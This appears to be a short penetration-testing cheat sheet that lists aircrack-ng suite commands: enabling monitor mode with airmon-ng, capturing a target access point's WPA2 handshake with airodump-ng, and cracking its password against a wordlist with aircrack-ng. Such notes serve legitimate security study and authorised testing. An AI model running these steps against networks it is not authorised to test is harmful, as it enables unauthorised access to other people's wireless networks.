πŸ”’Wi-FI

Airmon-ng

Usage

# Usage
airmon-ng <start|stop> <interface> [channel] or airmon-ng <check|check kill>

# Check for interference
airmon-ng check
# If there are interferences then do airmon-ng check kill

# Select Interface
airmon-ng start wlan0
# Check interface with ifconfig or ip a

Airodump-ng

Usage#

# Usage
airodump-ng <options> <interface>[,<interface>,...]

# Dump handshakes from interface
airodump-ng wlan0

# Attack Device
airodump-ng -w Attack1 -c 1 --bssid E6:6F:14:31:63:1C wlan0

Aircrack-ng

Usage

# Usage
aircrack-ng [options] <capture file(s)>

# Crack password
aircrack-ng -a2 -b E6:6F:14:31:63:1C -w /root/Desktop/wordlist.txt /root/Desktop/Attack1-01.cap

Last updated